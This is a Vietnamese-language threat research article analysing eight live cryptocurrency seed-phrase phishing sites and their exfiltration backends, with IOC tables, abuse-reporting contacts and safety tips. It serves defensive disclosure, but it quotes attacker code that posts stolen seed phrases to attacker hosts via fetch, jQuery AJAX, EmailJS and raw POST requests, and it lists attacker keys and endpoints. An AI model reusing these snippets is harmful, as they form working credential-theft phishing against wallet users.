Quay lại trang Tin tức
Điều tra sâu rộng

Phân tích chi tiết về lừa đảo tiền điện tử:
Phân tích 8 vụ tấn công thực tế

Chúng tôi đã chặn được lưu lượng truy cập lừa đảo đang diễn ra, tiến hành phân tích ngược 5 công cụ đánh cắp cụm từ hạt giống và truy vết dữ liệu bị đánh cắp đến các bot Telegram, tài khoản EmailJS và các hệ thống nền tảng Phishing-as-a-Service.

Ngày 27 tháng 3 năm 2026 Nghiên cứu PhishDestroy Thời gian đọc: 18 phút
Phân tích quá trình điều tra các vụ lừa đảo qua tiền điện tử
Phân tích trực tiếp lưu lượng lừa đảo bị chặn đã phơi bày toàn bộ cơ sở hạ tầng tấn công
8Các trang web được phân tích
7Các phương pháp trích xuất dữ liệu
1,824+Thông tin đăng nhập bị đánh cắp
380+Các thương hiệu ví
$0Chi phí tấn công

Những gì chúng tôi đã phát hiện

Mỗi ngày, hàng nghìn người dùng tiền điện tử bị mất tiền vào tay các trang web lừa đảo trông không khác gì các dịch vụ ví tiền điện tử hợp pháp. Nhưng điều gì sẽ xảy ra phía sau Nút “Connect Wallet” giả mạo đó à? Cụm từ hạt giống của bạn thực sự được lưu ở đâu?

Chúng tôi đã chặn lưu lượng HTTP trực tiếp từ 5 trang web lừa đảo đang hoạt động, tải xuống toàn bộ mã nguồn của chúng và theo dõi từng điểm cuối rò rỉ dữ liệu đến đích cuối cùng. Cuộc điều tra này đã vạch trần toàn bộ cơ chế hoạt động của các vụ lừa đảo tiền điện tử hiện đại — từ các thủ đoạn thao túng tâm lý khiến bạn nhập cụm từ hạt giống, cho đến bot Telegram chuyển thông tin đó đến kẻ tấn công theo thời gian thực.

Lưu ý

Tất cả các cụm từ hạt giống được trình bày trong bài viết này đều là dữ liệu thử nghiệm được tạo ngẫu nhiên. Không có thông tin đăng nhập thực nào bị rò rỉ trong quá trình điều tra này. Tất cả các trang web đã được báo cáo cho các nhà cung cấp dịch vụ lưu trữ và bộ phận xử lý vi phạm tương ứng.

Mô hình tấn công phổ quát

Mặc dù có thương hiệu và hệ thống nền tảng khác nhau, cả 8 trang web lừa đảo này đều tuân theo mô hình phễu tâm lý hoàn toàn giống hệt nhau:

Trang đíchXây dựng lòng tin
Công cụ chọn ví60–110+ biểu tượng
Thông báo giả mạo "Đang kết nối..."Hẹn giờ 3–5 giây
"Kết nối không thành công"Luôn thất bại
Nhập liệu thủ côngHạt giống / Khóa / Kho khóa
Rò rỉ dữ liệuTG / Email / API

Nhận định quan trọng: hiệu ứng động “Đang kết nối...” luôn được lập trình cố định để thất bại. Trong mã nguồn của Trang web số 4, chúng tôi đã phát hiện const success = false — không có bất kỳ nỗ lực kết nối ví nào. Toàn bộ quy trình này chỉ nhằm mục đích hướng nạn nhân đến biểu mẫu “Kết nối thủ công”.

Quy trình tấn công lừa đảo tiền điện tử gồm sáu bước
Chuỗi tấn công 6 bước phổ biến mà tất cả các trang web lừa đảo mà chúng tôi đã phân tích đều có chung

8 địa điểm: Phân tích chi tiết

1
Giao thức lớp mạng
networklayers.pages.dev
Trực tiếpCloudflare PagesBot Telegram + EmailJS

Mạo danh

Một “giao thức phi tập trung” hư cấu dành cho việc xác thực ví. Sử dụng bảng giá thời gian thực từ CryptoCompare và các liên kết đến các trình khám phá blockchain thực tế (Ethereum, BSC, Polygon, Avalanche, Solana, Cardano) để tăng tính xác thực. Trang đích hiển thị hơn 100 biểu tượng ví và quy trình "xác thực" gồm 3 bước.

Chuỗi thoát dữ liệu kép

Hệ thống backend tinh vi nhất trong số 5 hệ thống — mọi thông tin đăng nhập bị đánh cắp đều được chuyển qua hai kênh độc lập đồng thời:

Victim submits seed phrase
  |
  +--> Channel 1: axios POST --> Express.js on Render.com
  |      |
  |      +--> Telegram Bot API --> @metatech2 (instant DM)
  |
  +--> Channel 2: fetch POST --> EmailJS API
         |
         +--> Bestgrace309@gmail.com (email backup)

Kết quả điều tra OSINT

Chỉ sốGiá trị
Email lừa đảoBestgrace309@gmail.com
Bot Telegram@DewdropsTG_bot (ID: 7567323692)
Người nhận Telegram@metatech2 (ID trò chuyện: 7350941887)
Hệ thống phía máy chủemailjs-backend-ovtg.onrender.com
Dịch vụ EmailJSservice_d5qigxs / template_7bqxeaa
Miền ẩnlayerschain.in (từ kỹ thuật che giấu địa chỉ email của CF)
Tin nhắn đã gửi1.824+ (từ ID tin nhắn trên Telegram)
Tuổi miền2 ngày (TLS: 25 tháng 3 năm 2026)
Sự cố về an ninh hoạt động (OPSEC)

Địa chỉ email của kẻ tấn công đã được tìm thấy trong một Lời bình luận bằng JavaScript bên trong config.js: // Bestgrace309@gmail.com. Họ đã quên gỡ bỏ nó trước khi triển khai. Ngoài ra, hệ thống trung gian Telegram hoàn toàn mở — không có xác thực, không có giới hạn tốc độ. Bằng cách giải mã dữ liệu từ Cloudflare data-cfemail ngoài việc làm mờ mã trong HTML, chúng tôi còn phát hiện ra một địa chỉ email ẩn: support@layerschain.in, kết nối với cơ sở hạ tầng lưu trữ của Ấn Độ và Nam Phi.

2
Chuyển đổi token AQLA
token-aqla.pages.dev
Trực tiếpCloudflare PagesCác biểu mẫu không tĩnh

Mạo danh

Một bản sao hoàn hảo đến từng pixel của thực tế Aqualibre (AQLA) trang di chuyển token. Mã HTML chứa một thẻ siêu dữ liệu cho biết nguồn: data-scrapbook-source="https://token.aqla.app/migration", có dấu thời gian ngày 19 tháng 11 năm 2024.

Phương pháp Zero-Code

Kẻ tấn công này cần không có mã phía máy chủ. Biểu mẫu này gửi dữ liệu trực tiếp đến Không tĩnh — một hệ thống xử lý biểu mẫu hợp lệ dành cho các trang web tĩnh. Mỗi lần gửi biểu mẫu đều được chuyển tiếp đến địa chỉ email của kẻ lừa đảo. Địa chỉ email của kẻ tấn công là không bao giờ hiển thị trong mã nguồn.

<form action="https://forms.un-static.com/forms/c78173e2d991...94c3f76">
  <textarea name="phrase"></textarea>
  <input name="private-key" />
  <textarea name="keystore-json"></textarea>
  <input name="password" />
</form>
Giá: 0 USD

Cloudflare Pages: miễn phí. Un-static Forms: miễn phí. Không mua tên miền. Không thuê máy chủ. Tổng chi phí cơ sở hạ tầng: không đô la.

3
SafePal Typosquat
antiresolve-mysafpalnode.pages.dev
Trực tiếp Cloudflare Pages Các biểu mẫu không tĩnh

Mạo danh

Tên miền con chứa "safpal" — một cách viết sai chính tả có chủ ý của SafePal, một ví phần cứng phổ biến. Trang web này tự xưng là "Blockchain Wallet Rectification" với 26 danh mục vấn đề giả mạo. Trang web sử dụng Typed.js để tạo hiệu ứng động cho tên các chuỗi khối (Ethereum, BSC, Polygon...) và một bảng hiển thị giá LiveCoinWatch nhằm tạo sự tin cậy.

Cùng một bộ thiết bị, cùng một người vận hành?

Sử dụng mẫu lừa đảo hoàn toàn giống hệt nhau như Địa điểm số 2: giống hệt connect.html, giống hệt nhau wallets.html với hơn 60 biểu tượng, cùng một nền tảng Un-static (ID biểu mẫu khác nhau — 6f1b82c3...da9943af). Bộ dụng cụ giống hệt nhau này cho thấy rõ ràng rằng một nhà điều hành quản lý cả hai trang web.

Các lỗi chính tả trong mã nguồn: "Privay Policy" (thiếu chữ 'c'), "seperated" (phải là "separated"), "Kestore" (thiếu chữ 'y'). Trường mật khẩu sử dụng type="text" thay vì type="password".

4
Bản sao mạng Flare
flaremainnet.pages.dev
Trực tiếpCloudflare PagesEmailJS kép (Dự phòng)

Mạo danh

Một bản sao gần như hoàn hảo của Mạng Flare portal — một blockchain EVM Layer-1 thực sự với các giao thức FTSO và Data Connector. Sao chép hơn 30 đối tác trong hệ sinh thái, giao diện điều hướng và nhận diện thương hiệu. Biểu tượng favicon được tải từ một tên miền typosquat: portal.flaremainet.com (thiếu một chữ 'n' trong từ "mainnet").

Cơ chế dự phòng kép của EmailJS

Trang web duy nhất sử dụng hai tài khoản EmailJS riêng biệt cùng lúc để đảm bảo tính dự phòng chống Gỡ bỏ:

// Channel 1: EmailJS SDK
emailjs.send('service_6dt5h1k', 'template_hjqp9gb', payload)
// Key: Sza6lhzA9hKHrm1k4

// Channel 2: jQuery AJAX direct
$.ajax('https://api.emailjs.com/api/v1.0/email/send', {
  data: { service_id: 'service_isy47de',
          template_id: 'template_dkk4d1b',
          user_id: 'JsVEgXVcaSTro1etu' }
})

Tiêu đề email cho mỗi vụ trộm cắp: "New Wallet Details from Flare".

Đây là một doanh nghiệp đã được cấp vốn

Mã HTML chứa Google Tag Manager (GTM-WX2D2TR), Microsoft Clarity (j4bllybjkp), Tính năng bảo vệ PPC của Lunio, và một Pixel quảng cáo Twitter/X. Kẻ tấn công đang chạy quảng cáo trả phí để dụ các nạn nhân truy cập vào trang web lừa đảo và lọc các lần nhấp chuột của bot. Đây không phải là một sở thích — mà là một hoạt động được tài trợ, có hệ thống phân tích và chi tiêu cho quảng cáo.

Trang web lừa đảo của Flare Network kết hợp cả EmailJS và quảng cáo trả phí
Trang web số 4: quảng cáo trả phí, theo dõi phân tích và trích xuất dữ liệu theo hai hướng — chiến dịch chuyên nghiệp nhất
5
COIN NODE / Sửa lỗi ví (PhaaS)
swiftauthapps.pages.dev
Hệ thống backend ngừng hoạt độngAPI PulseResolve (PhaaS)

Mạo danh

Một dịch vụ chung mang tên "COIN NODE" / "Wallet Fix" (không thuộc thương hiệu cụ thể nào). Bản quyền "Wallet Fix 2022" — mẫu bộ công cụ này đã có tuổi đời ít nhất 4 năm. Hình ảnh được lưu trữ trên pumpeth.com (WordPress trên AWS).

Dịch vụ lừa đảo qua email (Phishing-as-a-Service)

Kiến trúc backend đáng lo ngại nhất: một API đa người dùng dựa trên UUID:

POST https://api.pulseresolve.com/a26db20c-1dc4-4208-a60a-c2c3b22c02ef
Content-Type: multipart/form-data

wallet=Metamask&type=phrase&phrase=buddy+surprise+vapor+river+...

Mỗi kẻ lừa đảo đều có một điểm cuối UUID riêng. Một nhà điều hành trung tâm chịu trách nhiệm duy trì API, theo dõi các chiến dịch và có thể nhận một phần tiền bị đánh cắp. Đây là trộm cắp tiền điện tử có tổ chức — mô hình “Phishing-as-a-Service”.

Cơ sở hạ tầng liên quan (Hầu như không còn hoạt động)

MiềnVai tròTrạng thái
api.pulseresolve.comAPI trích xuất dữ liệuNXDOMAIN
walletissuesfix.netDịch vụ lưu trữ faviconNXDOMAIN
syncwallet.onlineLogo chủ nhàNXDOMAIN
pumpeth.comCDN hình ảnhTrực tiếp (AWS)
Giao diện người dùng Zombie

Phần backend đã ngừng hoạt động, nhưng Giao diện người dùng vẫn đang hoạt động trên Cloudflare Pages. Nếu kẻ tấn công đăng ký lại pulseresolve.com, trang web sẽ ngay lập tức hoạt động trở lại.

6
Trung tâm hỗ trợ + Khôi phục sổ cái
wallet-support-39n.pages.dev & ledger-recovery.support
Trực tiếpCloudflare Pages + ReplitAPI C2 tùy chỉnhTự động hoàn thành BIP39

Mạo danh

A chiến dịch hai mũi nhọn: một “Trung tâm hỗ trợ” chung tại wallet-support-39n.pages.dev với 15 danh mục phát hành giả mạo và 39 thương hiệu ví, cùng với một Bản sao quy trình đăng ký Ledger với độ chính xác đến từng pixel tại ledger-recovery.support được lưu trữ trên Replit — bao gồm các tính năng chọn mẫu thiết bị, thiết lập mã PIN và bảng cụm từ hạt giống gồm 24 từ với Tính năng tự động hoàn thành BIP39 thực sự.

Hệ thống C2 chống quét

Trang hỗ trợ ví gửi dữ liệu bị đánh cắp đến api.uranustoken.org/log — một máy chủ điều khiển (C2) chạy trên nền tảng nginx/Ubuntu được tùy chỉnh, đặt phía sau Cloudflare. Phần backend cố ý từ chối tất cả các yêu cầu GET (trả về lỗi 522 do hết thời gian chờ), chỉ phản hồi với yêu cầu POST. Điều này có nghĩa là các công cụ quét URL, trình thu thập dữ liệu của Google Safe Browsing và các nhà nghiên cứu bảo mật khi gửi yêu cầu GET đến điểm cuối này sẽ không nhận được phản hồi nào — máy chủ C2 dường như đã ngừng hoạt động.

// config.js — C2 config exposed in plaintext
const config = {
  serverURL: "https://api.uranustoken.org",
  allowedWallets: ["phantom","solfare","metamask","trustwallet",
    "coinbasewallet","ledger","trezor","okx","sui","backpack",
    "tonkeeper","magiceden","slush" /* + 26 more */]
};
window.IWMConfig = config;

// Exfiltration function (deobfuscated from bundle)
function Ae(seedPhrase, passPhrase, walletName) {
  fetch(serverURL + "/log", {
    method: "POST",
    headers: {"Content-Type": "application/json"},
    body: JSON.stringify({seedPhrase, passPhrase, walletName, apiKey})
  })
}

Bản sao của Ledger chạy một phần backend Express.js riêng biệt ngay trên chính Replit: POST /api/recovery-phrase thu thập {deviceId, pin, phrase}. Nó trả về 400 {"error":"Invalid data provided"} khi gặp dữ liệu đầu vào không hợp lệ — xác nhận rằng phần xử lý phía sau là đang hoạt động và đang được xác thực tích cực dữ liệu bị đánh cắp.

Kết quả điều tra OSINT

Chỉ sốGiá trị
Giao diện người dùng (Ví)wallet-support-39n.pages.dev
Giao diện người dùng (Ledger)ledger-recovery.support (34.111.179.208)
C2 Hậu kỳ api.uranustoken.org → nginx/1.24.0 Ubuntu
Các địa chỉ IP C2104.21.60.163 / 172.67.198.35 (Cloudflare)
Replit Xác minha43d3852-5304-47af-a61b-f0f6f3912736
Cơ quan đăng kýName.com (ledger-recovery.support)
Đã triển khaiNgày 9 tháng 1 năm 2026 (thẻ Last-Modified)
Công nghệ được sử dụng React + Vite + Tailwind phiên bản 4.1 + Framer Motion
Mức độ trung thực cao nhất về trải nghiệm người dùng (UX)

Gói JS có dung lượng 466 KB chứa Danh sách từ đầy đủ theo tiêu chuẩn BIP39 đối với tính năng tự động hoàn thành theo thời gian thực, có 67 lần đề cập đến “passphrase” và 39 lần đề cập đến “mnemonic”. Bản sao Ledger này hướng dẫn nạn nhân thực hiện quy trình thiết lập ban đầu y hệt như một thiết bị Ledger chính hãng — đây là trang lừa đảo thuyết phục nhất trong toàn bộ cuộc điều tra này. Trang apiKey trường trong tệp cấu hình gợi ý một Kiến trúc PaaS đa người dùng.

7
Nền tảng khởi chạy phi tập trung
mainnetvalidationapp.pages.dev
Trực tiếpCloudflare PagesFormSubmit.co

Mạo danh

Một “Nền tảng ra mắt phi tập trung” chung với 21 loại mồi (Staking, Chuyển đổi, Xác minh danh tính (KYC), Chương trình tặng quà, Nhận phần thưởng, Khôi phục tài sản, Bán trước, Phát hành NFT, Tài khoản bị khóa...) và Hơn 70 thương hiệu ví — một trong những danh sách ví tiền điện tử đầy đủ nhất mà chúng tôi từng gặp. Lỗi chính tả dễ nhận ra “Sychronize” (thiếu chữ ‘n’) đã vạch trần đây là hàng giả.

Pipeline xử lý FormSubmit

Công dụng FormSubmit.co — một dịch vụ chuyển đổi biểu mẫu sang email hợp pháp. Giá trị băm của điểm cuối a2cf4131f1a5d39453c7c183df96f86f là giá trị MD5 của địa chỉ email của kẻ lừa đảo. Chúng tôi đã thử hàng trăm mẫu địa chỉ email theo phương pháp dò tìm toàn bộ trên các dịch vụ Gmail, Yahoo, Hotmail, ProtonMail, Yandex và Mail.ru — không tìm thấy kết quả phù hợp. Kẻ lừa đảo sử dụng một địa chỉ email hiếm gặp hoặc được tạo ngẫu nhiên.

// Exfiltration via jQuery AJAX → FormSubmit → scammer email
$.ajax({
    url: "https://formsubmit.co/ajax/a2cf4131f1a5d39453c7c183df96f86f",
    method: "POST",
    dataType: "JSON",
    data: {
        dappWord: seedPhrase,       // THE STOLEN SEED PHRASE
        dappName: walletName,       // Which wallet was selected
        linkName: "DAPP DECENTRALIZED"  // Campaign identifier
    }
});

Kết quả điều tra OSINT

Chỉ sốGiá trị
Miềnmainnetvalidationapp.pages.dev
Hash khi gửi biểu mẫua2cf4131f1a5d39453c7c183df96f86f
Mã chiến dịchỨNG DỤNG PHÂN CẤP (DAPP)
Bộ công cụ FontAwesomebdc3291137 (bộ sản phẩm số 112310842, phiên bản miễn phí v6.7.2)
jQuery3.2.1 và 3.5.1 được tải đồng thời
BootstrapCSS 5.2.2 + JS 5.3.0-alpha1 (không tương thích)
Hai tay cầm theo dõi

Bộ công cụ FontAwesome bdc3291137 — FontAwesome có thể xác định chủ sở hữu tài khoản liên quan đến ID bộ công cụ này. Thẻ chiến dịch DAPP DECENTRALIZED có thể xuất hiện trên các trang web lừa đảo khác sử dụng cùng một giá trị băm FormSubmit. Sau khi đánh cắp cụm từ hạt giống, một mã QR giả và mã tham chiếu ngẫu nhiên gồm 7 ký tự hiển thị thông báo: “Hãy liên hệ với Quản trị viên và cung cấp mã tham chiếu duy nhất của bạn” — khiến các nạn nhân phải chờ đợi thay vì tiến hành điều tra.

8
R2 Bucket + PHP trên máy tính cá nhân
pub-519769e9eb634616b1746c2018641d56.r2.dev
ChếtCloudflare R2PHP + DDNS

Mạo danh

Không rõ — cả phần frontend lẫn phần backend đều đang ngoại tuyến. Dựa trên cấu trúc của payload, đây là một phần mềm đánh cắp cụm từ hạt giống của ví tiền điện tử. Cái Bucket công khai Cloudflare R2 (lưu trữ đối tượng, không phải Pages) là một phương thức lừa đảo qua email đã được ghi chép đầy đủ với hơn 5.000 trang web độc hại đã được phát hiện và lưu lượng truy cập tăng gấp 61 lần theo báo cáo của Netskope.

Cấu hình cho người mới bắt đầu

Điều quan trọng nhất phép toán cơ bản trong bộ sưu tập này. Các cụm từ hạt giống được gửi đi từng từ một đến một tập lệnh PHP đang chạy trên máy tính cá nhân hoặc máy chủ ảo (VPS) được kết nối qua dịch vụ DNS động miễn phí:

POST mercifuljigga4real123.publicvm.com/fuc.php
Content-Type: application/x-www-form-urlencoded

pass=Word+1:+finger+%0AWord+2:+flag+%0AWord+3:+across
    +%0AWord+4:+admit+%0AWord+5:+weather+%0AWord+6:+fragile
    +%0AWord+7:+trick+%0AWord+8:+weekend+%0AWord+9:+gift
    +%0AWord+10:+grit+%0AWord+11:+borrow+%0AWord+12:+access

Kết quả điều tra OSINT

Chỉ sốGiá trị
Giao diện người dùng pub-519769e9eb634616b1746c2018641d56.r2.dev [NGỪNG HOẠT ĐỘNG]
Hệ thống phía máy chủ mercifuljigga4real123.publicvm.com [NXDOMAIN]
Mã nhận dạng xô R2519769e9eb634616b1746c2018641d56
Nhà cung cấp dịch vụ DDNS DNSExit.com / Netdorm, Inc. (Cincinnati, OH)
DNS NSns10–13.dnsexit.com
Tên người dùngmercifuljigga4real123
Tên người dùng OSINT: mercifuljigga4real123

"Merciful" + "jigga" (biệt danh của Jay-Z) + "4real" + "123" — một biệt danh mang đậm dấu ấn cá nhân, thể hiện sự gắn bó với văn hóa hip-hop. Không tìm thấy trên bất kỳ nền tảng nào được lập chỉ mục: GitHub, X, Instagram, TikTok, Reddit, YouTube, Twitch hoặc Steam. Có khả năng người này đang hoạt động trên Discord, Telegram hoặc các nền tảng trò chơi với tên này hoặc các biến thể tương tự. Tên tệp fuc.php phù hợp với phong cách táo bạo của tay cầm.

7 cách để đánh cắp cụm từ hạt giống của bạn

So sánh bốn phương pháp lừa đảo tiền điện tử nhằm đánh cắp dữ liệu
Bảy kiến trúc rò rỉ dữ liệu khác nhau được sử dụng trên 8 trang web lừa đảo
Phương phápCác trang webCách thức hoạt độngTốc độChi phí
Bot Telegram#1 Express.js trên Render.com hoạt động như một máy chủ trung gian cho Bot API. Kẻ lừa đảo sẽ nhận được tin nhắn trực tiếp (DM) ngay lập tức kèm theo thông tin đăng nhập. Thời gian thực$0
EmailJS#1, #4 JavaScript phía máy khách gửi trực tiếp đến API EmailJS, sau đó API này sẽ chuyển tiếp đến địa chỉ email của kẻ lừa đảo. ~1 phút$0
Các biểu mẫu không tĩnh#2, #3 Biểu mẫu HTML tiêu chuẩn sử dụng phương thức POST gửi dữ liệu đến một dịch vụ biểu mẫu hợp lệ, dịch vụ này sẽ chuyển tiếp các dữ liệu được gửi qua email. ~1 phút$0
FormSubmit.co#7 jQuery AJAX gửi đến FormSubmit.co. Địa chỉ email được ẩn sau hàm băm MD5. Chiến dịch được gắn thẻ là "DAPP DECENTRALIZED". ~1 phút$0
API C2 tùy chỉnh#6 Ứng dụng React SPA gửi yêu cầu đến API nginx/Express được triển khai phía sau Cloudflare. Bỏ qua các yêu cầu GET (522) để tránh bị máy quét phát hiện. Chỉ phản hồi với yêu cầu POST. Thời gian thực~5 USD/tháng
PHP + DDNS#8 Tập lệnh PHP chạy trên máy tính cá nhân thông qua dịch vụ DNS miễn phí (publicvm.com). Cụm từ hạt giống được gửi từng từ một. Thời gian thực$0
API PhaaS#5 API đa người dùng dựa trên UUID. Nhà điều hành trung tâm quản lý hệ thống nền, còn những kẻ lừa đảo thì thuê các điểm cuối. Thời gian thựcKhông rõ

7 dấu hiệu cảnh báo giúp phát hiện mọi trang web lừa đảo

Nếu bạn thấy bất kỳ Trong số đó, hãy đóng tab ngay lập tức:

1. Thông báo “Kết nối không thành công” luôn là giả mạo

Các kết nối ví thực sự sử dụng giao thức WalletConnect hoặc tiện ích mở rộng trình duyệt. Chúng không bao giờ hiển thị thông báo lỗi “Kết nối không thành công” yêu cầu bạn nhập cụm từ hạt giống.

2. 50–110+ biểu tượng ví, một điểm đến duy nhất

Mỗi biểu tượng ví đều dẫn đến cùng một biểu mẫu. Một dịch vụ thực sự sẽ tích hợp SDK thực tế của từng ví.

3. Xuất hiện thông báo “Lỗi” sau khi bạn gửi

Thông báo lỗi giả mạo “503 Error” hoặc “Unknown Error” xuất hiện sau khi gửi là do cố ý. Dữ liệu của bạn đã bị đánh cắp — thông báo lỗi này nhằm lừa bạn thử lại bằng một ví khác.

4. Được lưu trữ trên .pages.dev

Cả 5 trang web này đều lạm dụng gói miễn phí của Cloudflare Pages. Không yêu cầu xác minh danh tính. Tình trạng lạm dụng Cloudflare Pages để lừa đảo đã tăng 198% vào năm 2025.

5. Ba tab: Cụm từ / Khóa riêng / Kho khóa

Không có dịch vụ hợp pháp nào cần cả ba loại thông tin xác thực này. Mẫu biểu có ba ô này là một dấu hiệu đặc trưng của bộ công cụ lừa đảo.

6. Không có tương tác với blockchain

Không có trang web nào trong số này tải được ethers.js, web3.js, hoặc thực hiện bất kỳ lệnh gọi RPC nào. Chúng chỉ là các biểu mẫu HTML thuần túy giả vờ là các ứng dụng phi tập trung (dApps).

7. Cơ sở hạ tầng miễn phí

Dịch vụ lưu trữ miễn phí + dịch vụ tạo biểu mẫu miễn phí + dịch vụ nhắn tin miễn phí = một chiến dịch lừa đảo hoàn chỉnh với chi phí 0 đô la. Nếu trang web không có tên miền thật, hãy cảnh giác.

Bảng xếp hạng IOC đầy đủ

Dành cho các đội ngũ an ninh, các nền tảng thông tin về mối đe dọa và những người báo cáo hành vi lạm dụng:

Tên miền & Cơ sở hạ tầng

MiềnLoạiTrạng thái
networklayers.pages.devGiao diện người dùng của trang lừa đảoTrực tiếp
token-aqla.pages.devGiao diện người dùng của trang lừa đảoTrực tiếp
antiresolve-mysafpalnode.pages.devGiao diện người dùng của trang lừa đảoTrực tiếp
flaremainnet.pages.devGiao diện người dùng của trang lừa đảoTrực tiếp
swiftauthapps.pages.devGiao diện người dùng của trang lừa đảoTrực tiếp
emailjs-backend-ovtg.onrender.comHệ thống xử lý phía sau của TG relayTrực tiếp
portal.flaremainet.comTài sản liên quan đến typosquattingKhông rõ
layerschain.inMiền liên quanDNS không hoạt động
api.pulseresolve.comHệ thống nền tảng PhaaSNXDOMAIN
walletissuesfix.netMáy chủ lưu trữ tài sảnNXDOMAIN
syncwallet.onlineLogo chủ nhàNXDOMAIN
pumpeth.comCDN hình ảnhTrực tiếp (AWS)
wallet-support-39n.pages.devGiao diện người dùng của trang lừa đảoTrực tiếp
ledger-recovery.supportLừa đảo qua Ledger (Replit)Trực tiếp
api.uranustoken.orgHệ thống backend C2 (nginx/Ubuntu)Trực tiếp
uranustoken.orgMiền gốc404
mainnetvalidationapp.pages.devGiao diện người dùng của trang lừa đảoTrực tiếp
pub-519769e9eb634616b1746c2018641d56.r2.devLừa đảo qua email (nhóm R2)Chế độ ngoại tuyến
mercifuljigga4real123.publicvm.comPhần backend PHP (DDNS)NXDOMAIN

Tài khoản và Mã định danh

LoạiGiá trịTrang web
EmailBestgrace309@gmail.com#1
Email (đã ẩn)support@layerschain.in#1
Bot Telegram@DewdropsTG_bot (7567323692)#1
Người dùng Telegram@metatech2 (7350941887)#1
EmailJS #1service_d5qigxs / I-7q0Bs-ilK3rFcWj#1
EmailJS #2service_6dt5h1k / Sza6lhzA9hKHrm1k4#4
EmailJS #3service_isy47de / JsVEgXVcaSTro1etu#4
Biểu mẫu không tĩnhc78173e2d991...94c3f76#2
Biểu mẫu không tĩnh6f1b82c3ce55...da9943af#3
UUID của PhaaSa26db20c-1dc4-4208-a60a-c2c3b22c02ef#5
GTMGTM-WX2D2TR#4
MS Clarityj4bllybjkp#4
Thực thể hiển thịrndr-id: ed83576e-b1b3-4c82#1
Replit Xác minha43d3852-5304-47af-a61b-f0f6f3912736#6
MD5 của FormSubmita2cf4131f1a5d39453c7c183df96f86f#7
Thẻ chiến dịchỨNG DỤNG PHÂN CẤP (DAPP)#7
Bộ công cụ FontAwesomebdc3291137 (bộ sản phẩm số 112310842)#7
Mã nhận dạng xô R2519769e9eb634616b1746c2018641d56#8
Tên người dùng/DDNSmercifuljigga4real123#8

Nên báo cáo các vụ lừa đảo qua tiền điện tử ở đâu

Nên báo cáo các trang web lừa đảo tiền điện tử ở đâu — chiến dịch gỡ bỏ đa phương thức
Nhắm mục tiêu đồng thời vào các dịch vụ lưu trữ, dịch vụ hậu trường và nền tảng nhắn tin để đạt tốc độ gỡ bỏ tối đa
Dịch vụNhững nội dung cần báo cáoLàm thế nào
Cloudflare7 tài khoản .pages.dev + 1 thùng R2abuse.cloudflare.com
Google Safe BrowsingTất cả các URL lừa đảoBáo cáo lừa đảo
PhishTankTất cả các URL trong danh sách chặn của cộng đồngphishtank.org
EmailJS3 tài khoản bị lạm dụng (ID dịch vụ nêu trên)abuse@emailjs.com
Không tĩnh2 điểm cuối biểu mẫuLiên hệ qua un-static.com
Render.comHệ thống trung gian phía máy chủ của TelegramHiển thị biểu mẫu báo cáo lạm dụng
Telegram@DewdropsTG_bot + @metatech2telegram.org/support
Google (Gmail)Bestgrace309@gmail.comBáo cáo vi phạm của Google
Twitter/XTài khoản quảng cáo quảng bá Trang web số 4Báo cáo lạm dụng quảng cáo X
FormSubmit.coHash a2cf4131... (#7)Mẫu báo cáo lạm dụng FormSubmit
Replitledger-recovery.support (#6)Báo cáo vi phạm trên Replit
Name.comĐơn vị đăng ký cho ledger-recovery.supportLạm dụng dịch vụ Name.com
DNSExitmercifuljigga4real123.publicvm.comLạm dụng trên dnsexit.com
FontAwesomeBộ sản phẩm bdc3291137 (#7)Việc lạm dụng FontAwesome
ChainabuseTất cả các chiến dịch lừa đảoChainabuse.com

Cách bảo vệ bản thân

Quy tắc Vàng

Không có dịch vụ hợp pháp nào bao giờ yêu cầu bạn nhập cụm từ hạt giống vào một trang web cả. Các cụm từ hạt giống chỉ được nhập vào phần mềm ví chính thức trong quá trình khôi phục ví — tuyệt đối không được nhập trên các trang web của bên thứ ba có chức năng “xác thực”, “đồng bộ hóa” hoặc “khôi phục”.

Trước khi kết nối bất kỳ ví nào:

  • Hãy xác minh xem URL có trùng khớp với tên miền chính thức hay không. Kiểm tra thông tin chi tiết của chứng chỉ SSL.
  • Real WalletConnect sử dụng mã QR hoặc liên kết sâu — tuyệt đối không bao giờ sử dụng biểu mẫu cụm từ hạt giống.
  • Nếu xuất hiện thông báo “kết nối không thành công” và bạn được yêu cầu nhập thông tin đăng nhập thủ công — đó là một vụ lừa đảo.
  • Kiểm tra các liên kết đáng ngờ trên PhishTank hoặc VirusTotal trước khi tương tác.
  • Hãy sử dụng ví phần cứng — loại ví này yêu cầu xác nhận vật lý cho mỗi giao dịch.
  • Hãy lưu lại các URL chính thức. Đừng bao giờ nhấp vào các liên kết từ quảng cáo, tin nhắn trực tiếp (DM) hoặc mạng xã hội.

Hệ thống phân loại các hình thức lừa đảo tiền điện tử

Những kẻ đánh cắp cụm từ hạt giống chỉ là một trong nhiều loại. Dưới đây là bức tranh toàn cảnh về các hình thức lừa đảo tiền điện tử — chúng tôi sẽ tiếp tục phân tích sâu hơn về từng loại.

Các công cụ đánh cắp cụm từ hạt giống
Các trang web giả mạo “Connect Wallet” nhằm lừa bạn nhập cụm từ khôi phục. Nội dung chính của bài viết này — phân tích chi tiết 5 ví dụ thực tế.
Đã đề cập ở trên
Chiếm đoạt quyền phê duyệt
Các ứng dụng phi tập trung (dApp) độc hại yêu cầu quyền phê duyệt token không giới hạn thông qua MetaMask. Một khi được phê duyệt, kẻ tấn công sẽ rút cạn ví của bạn mà không cần đến cụm từ khôi phục.
Sắp ra mắt
Lừa đảo qua tin nhắn (Permit2)
Lợi dụng lỗ hổng EIP-2612 liên quan đến quyền chuyển nhượng không cần tiêu tốn gas. Nạn nhân ký vào một thông điệp ngoài chuỗi để cấp quyền chuyển nhượng token — không có bất kỳ sự chấp thuận nào trên chuỗi được hiển thị cho đến khi xảy ra vụ rút cạn.
Sắp ra mắt
Các tuyên bố giả mạo về airdrop
Các đợt airdrop token giả mạo yêu cầu người dùng “nhận” thông qua một hợp đồng thông minh độc hại. Giao dịch “nhận” này thực chất sẽ chuyển các token thật của bạn ra ngoài.
Sắp ra mắt
Các phần mềm chiếm quyền điều khiển khay nhớ tạm
Phần mềm độc hại theo dõi khay nhớ tạm của bạn và âm thầm thay thế các địa chỉ ví đã sao chép bằng địa chỉ của kẻ tấn công trước khi bạn dán.
Sắp ra mắt
Làm bụi + Đầu độc
Các giao dịch nhỏ từ các địa chỉ trông giống nhau sẽ làm lộn xộn lịch sử giao dịch của bạn. Nạn nhân sao chép địa chỉ giả mạo từ lịch sử giao dịch để sử dụng cho lần chuyển tiền tiếp theo.
Sắp ra mắt

Sự thật khó chấp nhận

